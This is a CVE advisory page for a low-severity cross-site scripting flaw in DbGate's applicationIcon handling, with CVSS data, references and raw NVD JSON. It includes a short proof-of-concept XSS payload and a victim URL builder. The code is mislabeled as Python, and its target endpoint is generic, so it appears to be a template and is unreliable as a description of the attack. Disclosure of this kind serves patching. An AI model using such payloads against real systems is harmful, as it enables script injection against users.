CVE-2026-6216

Description

A security vulnerability has been detected in DbGate up to 7.1.4. This affects an unknown function of the file packages/web/src/icons/FontIcon.svelte of the component SVG Icon String Handler. Such manipulation of the argument applicationIcon leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 7.1.5 mitigates this issue. It is advisable to upgrade the affected component.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

DbGate <= 7.1.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2026-6216
// Vulnerability: Stored/Reflected XSS in applicationIcon parameter
// Target: DbGate <= 7.1.4

// Step 1: Create a malicious payload targeting the applicationIcon parameter
var payload = '"><img src=x onerror=alert(1)>';

// Step 2: Encode the payload to be URL safe
var encodedPayload = encodeURIComponent(payload);

// Step 3: Simulate the request to the vulnerable endpoint
// In a real scenario, this URL is sent to the victim
var targetUrl = "http://target-dbgate-instance.com/endpoint?applicationIcon=" + encodedPayload;

console.log("[+] Exploit URL: " + targetUrl);

// Note: When the victim loads the page, the injected script will execute.
// This demonstrates the lack of sanitization in the SVG Icon handler.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6216
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6216
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6216/
[4] VulDB https://vuldb.com/cve/CVE-2026-6216
[5] https://github.com/dbgate/dbgate/
[6] https://github.com/dbgate/dbgate/releases/tag/v7.1.5
[7] https://vuldb.com/submit/785841
[8] https://vuldb.com/vuln/357135
[9] https://vuldb.com/vuln/357135/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6216", "sourceIdentifier": "[email protected]", "published": "2026-04-13T21:16:32.003", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in DbGate up to 7.1.4. This affects an unknown function of the file packages/web/src/icons/FontIcon.svelte of the component SVG Icon String Handler. Such manipulation of the argument applicationIcon leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 7.1.5 mitigates this issue. It is advisable to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/dbgate/dbgate/", "source": "[email protected]"}, {"url": "https://github.com/dbgate/dbgate/releases/tag/v7.1.5", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/785841", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/357135", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/357135/cti", "source": "[email protected]"}]}}